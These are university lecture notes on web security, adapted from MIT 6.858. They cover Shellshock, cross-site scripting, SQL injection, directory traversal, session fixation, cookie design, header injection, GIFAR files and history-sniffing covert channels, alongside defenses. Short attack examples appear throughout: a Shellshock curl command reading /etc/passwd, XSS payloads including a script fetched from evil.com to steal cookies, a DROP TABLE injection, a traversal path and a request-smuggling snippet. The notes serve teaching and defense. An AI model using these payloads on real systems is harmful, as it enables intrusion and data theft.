-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy path10-web-defenses.txt
558 lines (534 loc) · 24.7 KB
/
10-web-defenses.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
Web Attacks and Defenses
========================
Credits: lecture notes judiciously adapted from MIT 6.858 by Nickolai Zeldovich & James Mickens
Last lecture, we looked at a core security
mechanism for the web: the same-origin policy.
-In this lecture, we'll continue to look at
how we can build secure web applications.
The recent "Shell Shock" bug is a good example
of how difficult it is to design web services
that compose multiple technologies.
-A web client can include extra headers
in its HTTP requests, and determine which
query parameters are in a request. Ex:
GET /query.cgi?searchTerm=cats HTTP/1.1
Host: www.example.com
Custom-header: Custom-value
CGI servers map the various components of the
HTTP request to Unix environment variables.
-Vulnerability: Bash has a parsing bug in the
way that it handles the setting of environment
variables! If a string begins with a certain
set of malformed bytes, bash will continue to
parse the rest of the string and execute any
commands that it finds! For example, if you
set an environment variable to a value like
this . . .
() { :;}; /bin/id
. . . will confuse the bash parser, and cause
it to execute the /bin/id command (which
displays the UID and GID information for
the current user).
-Exploit: e.g., curl -H "User-Agent: () {:;}; /bin/cat /etc/passwd" http://vulnerable.com/
-Live demo
Step 1: Fatch a Docker image with the vulnerability.
docker pull sadmin/shellshock
Step 2: Run the command.
docker run -it --rm --entrypoint=/usr/bin/env sadmin/shellshock x='() { :;}; echo vulnerable' bash -c "echo this is a test"
-More information: http://seclists.org/oss-sec/2014/q3/650
Shell Shock is a particular instance of
security bugs which arise from improper
content sanitization. Another type of content
sanitization failure occurs during cross-site
scripting attacks (XSS).
XSS enables attackers to inject client-side
script into Web pages viewed by other users.
Unlike most attacks, which involve two parties -
the attacker, and the web site,
or the attacker and the victim client,
the XSS attack involves three parties –
the attacker, a client and the web site.
The goal of the XSS attack is to steal the client
cookies, or any other sensitive information,
which can identify the client with the web site.
With the token of the legitimate user at hand,
the attacker can proceed to act as the user in
his/her interaction with the site – specifically,
impersonate the user.
-Example: Suppose that a CGI script (PHP) embeds
a query string parameter in the HTML that
it generates.
-Demo:
In browser, load these URLs:
http://perso.uclouvain.be/marco.canini/ingi2347/xss-demo.php?name=foo
http://perso.uclouvain.be/marco.canini/ingi2347/xss-demo.php?name=<b>foo</b>
http://perso.uclouvain.be/marco.canini/ingi2347/xss-demo.php?name=<script>alert('XSS');</script>
//The XSS attack doesn't work for this one . . .
//But if we disable the XSS filtering in Firefox, it works . . .
// [https://www.phillips321.co.uk/2012/03/01/xss-browser-filters-disabling-it-for-app-testing/]
//we'll see why later in the lecture.
http://perso.uclouvain.be/marco.canini/ingi2347/xss-demo.php?name=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
//Even though the browser caught the
//straightforward XSS injection, certain
//browser versions incorrectly parse our
//intentionally malformed HTML.
// [For more examples of XSS exploits via
// malformed code, go here:
// https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
// ]
Why is cross-site scripting so prevalent?
-Dynamic web sites incorporate user content in
HTML pages (e.g., comments sections).
-Web sites host uploaded user documents.
*HTML documents can contain arbitrary
Javascript code!
*Non-HTML documents may be content-sniffed
as HTML by browsers.
-Insecure Javascript programs may directly
execute code that comes from external parties
(e.g., eval(), setTimeout(), etc.).
XSS defenses
-Chrome and IE have a built-in feature which
uses heuristics to detect potential cross-site
scripting attacks.
*Ex: Is a script which is about to execute
included in the request that fetched the
enclosing page?
http://foo.com?q=<script src="evil.com/cookieSteal.js"/>
If so, this is strong evidence that something
suspicious is about to happen! The attack
above is called a "reflected XSS attack,"
because the server "reflects" or "returns"
the attacker-supplied code to the user's browser,
executing it in the context of the victim
page.
-This is why our first XSS attack in
the CGI example didn't work--the
browser detected reflected JavaScript
in the URL, and removed the trailing
</script> before it even reached the
CGI server.
-However . . .
*Filters don't have 100% coverage,
because there are a huge number of ways
to encode an XSS attack!
[https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet]
*Problem: Filters can't catch persistent XSS
attacks in which the server saves
attacker-provided data, which is then
permanently distributed to clients.
-Classic example: A "comments" section
which allows users to post HTML
messages.
-Another example: Suppose that a dating
site allows users to include HTML in
their profiles. An attacker can add
HTML that will run in a *different*
user's browser when that user looks
at the attacker's profile! Attacker
could steal the user's cookie.
-Another XSS defense: "httponly" cookies.
*A server can tell a browser that client-side
JavaScript should not be able to access
a cookie. [The server does this by adding
the "Httponly" token to a "Set-cookie"
HTTP response value.]
*This is only a partial defense, since the
attacker can still issue requests that
contain a user's cookies (CSRF).
-Privilege separation: Use a separate domain
for untrusted content.
*For example, Google stores untrusted content
in googleusercontent.com (e.g., cached
copies of pages, Gmail attachments).
*Even if XSS is possible in the untrusted
content, the attacker code will run in
a different origin.
*There may still be problems if the content
in googleusercontent.com points to URLs
in google.com.
-Content sanitization: Take untrusted content
and encode it in a way that constrains how
it can be interpreted.
*Ex: Django templates: Define an output
page as a bunch of HTML that has some
"holes" where external content can be
inserted.
[https://docs.djangoproject.com/en/dev/topics/templates/#automatic-html-escaping]
A template might contain code like
this . . .
<b>Hello {{ name }} </b>
. . . where "name" is a variable that is
resolved when the page is processed by
the Django template engine. That engine
will take the value of "name" (e.g.,
from a user-supplied HTTP query string),
and then automatically escape dangerous
characters. For example,
angle brackets < and > --> < and >
double quotes " --> "
This prevents untrusted content from
injecting HTML into the rendered page.
Templates cannot defend against all
attacks! For example . . .
<div class={{ var }}>...</div>
. . . if var equals . . .
'class1 onmouseover=javascript:func()'
. . . then there may be an XSS attack,
depending on how the browser parses
the malformed HTML.
*So, content sanitization kind-of works,
but it's extremely difficult to parse
HTML in an unambiguous way.
*Possibly better approach: Completely
disallow externally-provided HTML,
and force external content to be
expressed in a smaller language
(e.g., Markdown: http://daringfireball.net/projects/markdown/syntax).
Validated Markdown can then be translated
into HTML.
-Content Security Policy (CSP): Allows a web
server to tell the browser which kinds of
resources can be loaded, and the allowable
origins for those resources.
*Server specifies one or more headers of
the type "Content-Security-Policy".
*Example:
Content-Security-Policy: default-src 'self' *.mydomain.com
//Only allow content from the page's domain
//and its subdomains.
You can specify separate policies for
where images can come from, where scripts
can come from, frames, plugins, etc.
*CSP also prevents inline JavaScript, and
JavaScript interfaces like eval() which
allow for dynamic JavaScript generation.
-Some browsers allow servers to disable contet-type
sniffing (X-Content-Type-Options: nosniff).
SQL injection attacks.
-Suppose that the application needs to issue SQL
query based on user input:
query = "SELECT *
FROM table
WHERE userid=" + userid
-Problem: adversary can supply userid that changes
SQL query structure, e.g.,
"0; DROP table;"
-What if we add quoting around userid?
query = "SELECT *
FROM table
WHERE userid='" + userid + "'"
The vulnerability still exists! The attacker
can just add another quote as first byte
of userid.
-Real solution: unambiguously encode data.
Ex: replace ' with \', etc.
*SQL libraries provide escaping functions.
-Django defines a query abstraction layer
which sits atop SQL and allows applications
to avoid writing raw SQL (although they can
do it if they really want to).
-(Possibly fake) German license plate which
says ";DROP TABLE" to avoid speeding cameras
which use OCR+SQL to extract license plate
number.
You can also run into problems if untrusted entities
can supply filenames. These attacks are called
directory traversal attacks.
-Ex: Suppose that a web server reads files
based on user-supplied parameters.
open("/www/images/" + filename)
Problem: filename might look like this:
../../../../../etc/passwd
As with SQL injection, the server must
sanitize the user input: the server must
reject file names with slashes, or encode
the slashes in some way.
What is Django?
-Moderately popular web framework, used by
some large sites like Instagram, Mozilla,
and Pinterest.
*A "web framework" is a software system
that provides infrastructure for tasks
like database accesses, session management,
and the creation of templated content
that can be used throughout a site.
*Other frameworks are more popular:
PHP, Ruby on Rails.
*In the enterprise world, Java servlets
and ASP are also widely used.
-Django developers have put some amount of
thought into security.
*So, Django is a good case study to
see how people implement web security
in practice.
-Django is probably better in terms of
security than some of the alternatives
like PHP or Ruby on Rails, but the devil
is in the details.
Session management: cookies. [http://pdos.csail.mit.edu/papers/webauth:sec10.pdf]
Django, and many web frameworks put a
random session ID in the cookie.
-The Session ID refers to an entry in some session
table on the web server. The entry stores a bunch
of per-user information.
-Session cookies are sensitive: adversary can use
them to impersonate a user!
*As we discussed last lecture, the same-origin
policy helps to protect cookies . . .
*. . . but you shouldn't share a domain with
sites that you don't trust! Otherwise, those
sites can launch a session fixation attack:
1) Attacker sets the session ID in
the shared cookie.
2) User navigates to the victim site;
the attacker-chosen session ID is
sent to the server and used to
identify the user's session entry.
3) Later, the attacker can navigate
to the victim site using the
attacker-chosen session ID, and
access the user's state!
-Hmmm, but what if we don't want to have server-side
state for every logged in user?
Stateless cookies
-If you don't have the notion of a session, then
you need to authenticate every request!
*Idea: Authenticate the cookie using cryptography.
*Primitive: Message authentication codes (MACs)
-Think of it like a keyed hash, e.g.,
HMAC-SHA1: H(k, m)
-Client and server share a key; client
uses key to produce the message, and
the server uses the key to verify the
message.
*AWS S3 REST Services use this kind of cookie
[http://docs.aws.amazon.com/AmazonS3/latest/dev/RESTAuthentication.html].
-Amazon gives each developer an AWS Access
Key ID, and an AWS secret key. Each request
looks like this:
GET /photos/cat.jpg HTTP/1.1
Host: johndoe.s3.amazonaws.com
Date: Mon, 26 Mar 2007 19:37:58 +0000
Authorization: AWS AKIAIOSFODNN7EXAMPLE:frJIUN8DYpKDtOLCwoyllqDzg=
|___________________| |________________________|
Access key ID MAC signature
-Here's what is signed (this is slightly
simplified, see the link above for the
full story):
StringToSign = HTTP-Verb + "\n" +
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
ResourceName
*Note that this kind of cookie doesn't expire in
the traditional sense (although the server will
reject the request if Amazon has revoked the
user's key).
-You can embed an "expiration" field in
a *particular* request, and then hand
that URL to a third-party, such that,
if the third-party waits too long, AWS
will reject the request as expired.
AWSAccessKeyId=AKIAIOSFODNN7EXAMPLE&Expires=1141889120&Signature=vjbyPxybd...
|__________________|
Included in the string
that's covered by the
signature!
*Note that the format for the string-to-hash
should provide unambiguous parsing!
-Ex: No component should be allowed to
embed the escape character, otherwise
the server-side parser may get confused.
-Q: How do you log out with this kind of cookie design?
A: Impossible, if the server is stateless (closing
a session would require a server-side table
of revoked cookies).
*If server can be stateful, session IDs make
this much simpler.
*There's a fundamental trade-off between
reducing server-side memory state and
increasing server-side computation overhead
for cryptography.
Alternatives to cookies for session management.
-Use HTML5 local storage, and implement your own
authentication in Javascript.
*Some web frameworks like Meteor do this.
[https://www.meteor.com/blog/2014/03/14/session-cookies]
*Benefit: The cookie is not sent over the
network to the server.
*Benefit: Your authentication scheme is not
subject to complex same-origin policy for
cookies (e.g., DOM storage is bound to
a single origin, unlike a cookie, which
can be bound to multiple subdomains).
-Client-side X.509 certificates.
*Benefit: Web applications can't steal
or explicitly manipulate each other's
certificates.
*Drawback: Have weak story for revocation
(we'll talk about this more in future
lectures).
*Drawback: Poor usability---users don't
want to manage a certificate for each
site that they visit!
*Benefit/drawback: There isn't a notion of
a session, since the certificate is "always
on." For important operations, the application
will have to prompt for a password.
The web stack has some protocol ambiguities
that can lead to security holes.
-HTTP header injection from XMLHttpRequests
*Javascript can ask browser to add extra
headers in the request. So, what happens
if we do this?
var x = new XMLHttpRequest();
x.open("GET", "http://foo.com");
x.setRequestHeader("Content-Length", "7");
//Overrides the browser-computed field!
x.send("Gotcha!\r\n" +
"GET /something.html HTTP/1.1\r\n" +
"Host: bar.com");
The server at foo.com may interpret this as
two separate requests! Later, when the browser
receives the second request, it may overwrite
a cache entry belonging to bar.com with content
from foo.com!
*Solution: Prevent XMLHttpRequests from setting
sensitive fields like "Host:" or "Content-Length".
*Takehome point: Unambiguous encoding is
critical! Build reliable escaping/encoding!
-URL parsing ("The Tangled Web" page 154)
*Flash had a slightly different URL parser than
the browser.
*Suppose the URL was http://example.com:[email protected]/
-Flash would compute the origin as
"example.com".
-Browser would compute the origin as
"foo.com".
*Bad idea: complex parsing rules just to
determine the principal.
*Bad idea: re-implementing complex parsing
code.
-Here's a hilarious/terrifying way to launch
attacks using Java applets that are stored
in the .jar format.
*In 2007, Lifehacker.com posted an article
which described how you could hide .zip
files inside of .gif files.
*Leverage the fact that image renderers
process a file top-down, whereas decompressors
for .zip files typically start from the end
and go upwards.
*Attackers realized that .jar files are
based on the .zip format!
*THUS THE GIFAR WAS BORN: half-gif, half-jar,
all-evil.
-Really simple to make a GIFAR: Just
use "cat" on Linux or "cp" on Windows.
-Suppose that target.com only allows
external parties to upload images
objects. The attacker can upload a
GIFAR, and the GIFAR will pass
target.com's image validation tests!
-Then, if the attacker can launch
a XSS attack, the attacker can
inject HTML which refers to the
".gif" as an applet.
<applet code="attacker.class"
archive="attacker.gif"
...>
-The browser will load that applet
and give it the authority of
target.com!
Web applications are also vulnerable to covert channel
attacks.
-A covert channel is a mechanism which allows two
applications to exchange information, even though
the security model prohibits those applications
from communicating.
*The channel is "covert" because it doesn't
use official mechanisms for cross-app
communication.
-Example #1: CSS-based sniffing attacks
*Attacker has a website that he can convince
the user to visit.
*Attacker goal: Figure out the other websites
that the user has visited (e.g., to determine
the user's political views, medical history,
etc.).
*Exploit vector: A web browser uses different
colors to display visited versus unvisited
links! So, attacker page can generate a
big list of candidate URLs, and then inspect
the colors to see if the user has visited
any of them.
-Can check thousands of URLs a second!
-Can go breadth-first, find hits for
top-level domains, then go depth-first
for each hit.
*Fix: Force getComputedStyle() and related
JavaScript interfaces to always say that a
link is unvisited. [https://blog.mozilla.org/security/2010/03/31/plugging-the-css-history-leak/]
-Example #2: Cache-based attacks
*Attacker setup and goal are the same as before.
*Exploit vector: It's much faster for a browser
to access data that's cached instead of fetching
it over the network. So, attacker page can
generate a list of candidate images, try to
load them, and see which ones load quickly!
*This attack can reveal your location if the
candidate images come from geographically
specific images, e.g., Google Map tiles.
[http://w2spconf.com/2014/papers/geo_inference.pdf]
*Fix: No good ones. A page could never cache
objects, but this will hurt performance. But
suppose that a site doesn't cache anything.
Is it safe from history sniffing? No!
-Example #3: DNS-based attacks
*Attacker setup and goal are the same as
before.
*Exploit vector: Attacker page generates
references to objects in various domains.
If the user has already accessed objects
from that domain, the hostnames will already
reside in the DNS cache, making subsequent
object accesses faster! [http://sip.cs.princeton.edu/pub/webtiming.pdf]
*Fix: No good ones. Could use raw IP addresses
for links, but this breaks a lot of things
(e.g., DNS-based load balancing). However,
suppose that a site doesn't cache anything
and uses raw IP addresses for hostnames. Is
it safe from history sniffing? No!
-Example #4: Rendering attacks.
*Attacker setup and goal are the same as before.
*Exploit vector: Attacker page loads a candidate
URL in an iframe. Before the browser has fetched
the content, the attacker page can access . . .
window.frames[1].location.href
. . . and read the value that the attacker set.
However, once the browser has fetched the
content, accessing that reference will return
"undefined" due to the same-origin policy. So,
the attacker can poll the value and see how
long it takes to turn "undefined". If it takes
a long time, the page must not have been
cached! [http://lcamtuf.coredump.cx/cachetime/firefox.html]
*Fix: Stop using computers.
There are many other aspects to building a
secure web application.
-Ex: ensure proper access control for server-side
operations.
*Django provides Python decorators to
check access control rules.
-Ex: Maintain logs for auditing, prevent
an attacker from modifying the log.
Web application security is now a critical aspect, given how
popular some of these things are and the interests of malicious
attackers.
Developers need to be aware of security issues and establish
best practices for doing code reviews.
There are also many code analysis tools that help by trying to
automatically find possible application vulnerabilities.
There are also automated testing and penetration testing tools.
And remember, always sanitize your inputs!